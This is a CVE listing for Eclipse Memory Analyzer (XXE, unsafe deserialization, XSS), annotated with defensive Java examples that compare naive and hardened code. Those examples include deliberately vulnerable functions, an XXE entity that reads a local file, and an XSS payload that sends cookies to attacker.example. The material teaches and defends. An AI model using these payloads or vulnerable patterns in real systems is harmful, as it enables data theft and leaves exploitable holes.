Eclipse Memory Analyzer: published vulnerabilities

DATE        CVE             VULNERABILITY TITLE
            (each entry is followed by its description and its risk data: attack vector, attack complexity, vendor, CWE, severity band, CVSS base score)

2023-12-11  CVE-2023-6194   XXE vulnerability in Eclipse Memory Analyzer
    In Eclipse Memory Analyzer versions 0.7 to 1.14.0, report definition XML files are not filtered to prohibit document type definition (DTD) references to external entities. If a user chooses to generate a report from a malicious report definition XML file that contains an external entity reference, Eclipse Memory Analyzer may access external files or URLs defined via a DTD in the report definition.
    Attack vector: local | Attack complexity: low | Vendor: eclipse | CWE-611 (Improper Restriction of XML External Entity Reference) | Severity: high | CVSS 7.1

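The fix the advisory describes is to filter report definitions so that a DTD cannot pull in external entities. The following is an added example, not code from Eclipse Memory Analyzer: it parses a constructed, hypothetical report definition first with the JDK's default DOM parser, which honours the DOCTYPE and resolves SYSTEM entities, and then with a factory hardened to refuse any DOCTYPE. The element and attribute names (`report`, `name`, `query`) and the `file:///etc/hostname` target are made up for illustration.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

/** Parses a hypothetical report definition two ways: naively and with DTDs refused. */
public class ReportDefinitionXxe {

    // Constructed sample input, not a real report definition: the DTD declares an
    // external entity pointing at a local file and the document body references it.
    static final String MALICIOUS_REPORT =
        "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE report [<!ENTITY leak SYSTEM \"file:///etc/hostname\">]>\n"
        + "<report name=\"&leak;\"><query>SELECT * FROM java.lang.String</query></report>";

    static final String BENIGN_REPORT =
        "<?xml version=\"1.0\"?>\n"
        + "<report name=\"Strings\"><query>SELECT * FROM java.lang.String</query></report>";

    /** Vulnerable: JDK default factory settings resolve SYSTEM entities from the DTD. */
    static Document parseUnsafe(String xml) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        return dbf.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
    }

    /** Hardened: reject any DOCTYPE, and disable external access as defence in depth. */
    static Document parseSafe(String xml) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Primary control: a report definition has no business carrying a DTD at all.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth, for parser implementations that ignore the feature above.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
    }

    static String reportName(Document doc) {
        return doc.getDocumentElement().getAttribute("name");
    }

    public static void main(String[] args) throws Exception {
        System.out.println("benign, hardened parser   : " + reportName(parseSafe(BENIGN_REPORT)));
        try {
            // Where /etc/hostname exists this prints the file's contents as the report name.
            System.out.println("malicious, naive parser   : " + reportName(parseUnsafe(MALICIOUS_REPORT)));
        } catch (Exception e) {
            System.out.println("malicious, naive parser   : " + e);
        }
        try {
            parseSafe(MALICIOUS_REPORT);
            System.out.println("malicious, hardened parser: UNEXPECTEDLY ACCEPTED");
        } catch (SAXParseException e) {
            System.out.println("malicious, hardened parser: rejected (" + e.getMessage() + ")");
        }
    }
}
```

Run it with `java ReportDefinitionXxe.java` (Java 11 or later). The `disallow-doctype-decl` feature is the control that matters: with it set, the malicious document is rejected at the DOCTYPE before any entity is declared, so the remaining features only come into play if a different parser implementation is substituted for the JDK's.
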
2020-01-17  CVE-2019-17635  Deserialization of Untrusted Data vulnerability in Eclipse Memory Analyzer
    Eclipse Memory Analyzer version 1.9.1 and earlier is subject to a deserialization vulnerability if an index file of a parsed heap dump is replaced by a malicious version and the heap dump is reopened in Memory Analyzer.
    Attack vector: local | Attack complexity: low | Vendor: eclipse | CWE-502 (Deserialization of Untrusted Data) | Severity: high | CVSS 7.8

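This entry is the classic cached-artifact problem: the index is trusted because the tool wrote it, but it lives next to the heap dump, where whoever can supply the dump can also replace the index. The following is an added example, not Memory Analyzer's code; the `IndexFile` class, its fields and the key handling are hypothetical. It shows the two controls a reopen path wants: a keyed MAC over the serialized bytes, recorded when the index is written and verified before anything is deserialized, with the key assumed to be stored away from the dump directory, and a JDK 9+ `ObjectInputFilter` allow-list so that even if the integrity check is bypassed no class other than the index class can be instantiated from the stream.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.ArrayList;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class IndexReopenGuard {

    /** Bytes of a written index together with the MAC recorded for them. */
    static final class StoredIndex {
        final byte[] bytes;
        final byte[] mac;
        StoredIndex(byte[] bytes, byte[] mac) { this.bytes = bytes; this.mac = mac; }
    }

    // Assumed to be a random per-installation key kept in the user's configuration
    // directory, never beside the heap dump; a hard-coded placeholder here.
    static final byte[] KEY = "replace-me-with-a-random-per-installation-key".getBytes(StandardCharsets.UTF_8);

    static byte[] hmac(byte[] data) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(KEY, "HmacSHA256"));
        return mac.doFinal(data);
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }

    /** Index writer: serialize and record a MAC over the exact bytes written. */
    static StoredIndex writeIndex(IndexFile index) throws Exception {
        byte[] bytes = serialize(index);
        return new StoredIndex(bytes, hmac(bytes));
    }

    /** Second layer: only IndexFile may appear in the stream; everything else is rejected. */
    static IndexFile deserializeFiltered(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter("IndexFile;!*"));
            return (IndexFile) ois.readObject();
        }
    }

    /** Reopen path: verify the MAC in constant time, then deserialize under the filter. */
    static IndexFile reopenIndex(StoredIndex stored) throws Exception {
        if (!MessageDigest.isEqual(hmac(stored.bytes), stored.mac)) {
            throw new IOException("index bytes do not match the recorded MAC; refusing to deserialize");
        }
        return deserializeFiltered(stored.bytes);
    }

    public static void main(String[] args) throws Exception {
        StoredIndex genuine = writeIndex(new IndexFile(1234, 0x1000L));
        System.out.println("genuine index: objectCount=" + reopenIndex(genuine).objectCount);

        // Constructed "replacement" index: a serialized java.util.ArrayList stands in for
        // an attacker-chosen class; no real gadget chain is included.
        byte[] replaced = serialize(new ArrayList<String>());
        try {
            reopenIndex(new StoredIndex(replaced, genuine.mac));
        } catch (IOException e) {
            System.out.println("replaced index, MAC layer:    " + e.getMessage());
        }
        try {
            deserializeFiltered(replaced);
        } catch (InvalidClassException e) {
            System.out.println("replaced index, filter layer: " + e.getMessage());
        }
    }
}

/** Hypothetical stand-in for a cached heap-dump index: primitive fields only, no object graph. */
class IndexFile implements Serializable {
    private static final long serialVersionUID = 1L;
    final int objectCount;
    final long firstOffset;
    IndexFile(int objectCount, long firstOffset) {
        this.objectCount = objectCount;
        this.firstOffset = firstOffset;
    }
}
```

Run it with `java IndexReopenGuard.java` (Java 11 or later). A plain hash in a sidecar file would not help here, because an attacker who can replace the index can replace the sidecar too; the MAC only buys anything if the key is out of reach of whoever controls the dump directory. The filter is the layer that holds when that assumption fails, which is why it is applied unconditionally rather than only when the MAC check is skipped.
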
2020-01-17  CVE-2019-17634  Cross-site Scripting vulnerability in Eclipse Memory Analyzer
    Eclipse Memory Analyzer version 1.9.1 and earlier is subject to a cross-site scripting (XSS) vulnerability when generating an HTML report from a malicious heap dump.
    Attack vector: network | Attack complexity: low | Vendor: eclipse | CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting') | Severity: critical | CVSS 9.0

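An HTML report built from heap contents is a stored-XSS sink: every string in the dump (thread names, class names, field values) is attacker-controlled once the dump is. The following is an added example, not Memory Analyzer's report code; the table layout and the sample heap strings are constructed for illustration. It renders the same values naively and with HTML output encoding that covers both the text and the attribute context, which is where the naive version fails.

```java
import java.util.List;

/** Renders a "strings in heap" table to HTML, naively and with output encoding. */
public class HeapReportXss {

    // Constructed sample values that could sit in a heap before it is dumped; not from a real dump.
    static final List<String> HEAP_STRINGS = List.of(
        "ordinary value",
        "<script>document.location='http://attacker.example/?c='+document.cookie</script>",
        "\" onmouseover=\"alert(1)");

    /** Vulnerable: the heap string is concatenated straight into markup, in two contexts. */
    static String rowUnsafe(String value) {
        return "<tr><td title=\"" + value + "\">" + value + "</td></tr>";
    }

    /** Encode the five characters that matter in element text and double-quoted attributes. */
    static String escapeHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /** Hardened: every untrusted value is encoded and attributes are always double-quoted. */
    static String rowSafe(String value) {
        String enc = escapeHtml(value);
        return "<tr><td title=\"" + enc + "\">" + enc + "</td></tr>";
    }

    static String render(List<String> values, boolean safe) {
        StringBuilder html = new StringBuilder("<table>\n");
        for (String v : values) {
            html.append(safe ? rowSafe(v) : rowUnsafe(v)).append('\n');
        }
        return html.append("</table>").toString();
    }

    public static void main(String[] args) {
        System.out.println("--- naive ---\n" + render(HEAP_STRINGS, false));
        System.out.println("--- encoded ---\n" + render(HEAP_STRINGS, true));
    }
}
```

Run it with `java HeapReportXss.java`. In the naive output the second value becomes a live `<script>` element and the third closes the `title` attribute and injects an event handler; in the encoded output both survive only as text. The encoding belongs at the point where a string is written into markup, not at dump-parsing time, because the same heap string may be rendered into several contexts, and an unquoted attribute or a JavaScript context would need different treatment again.
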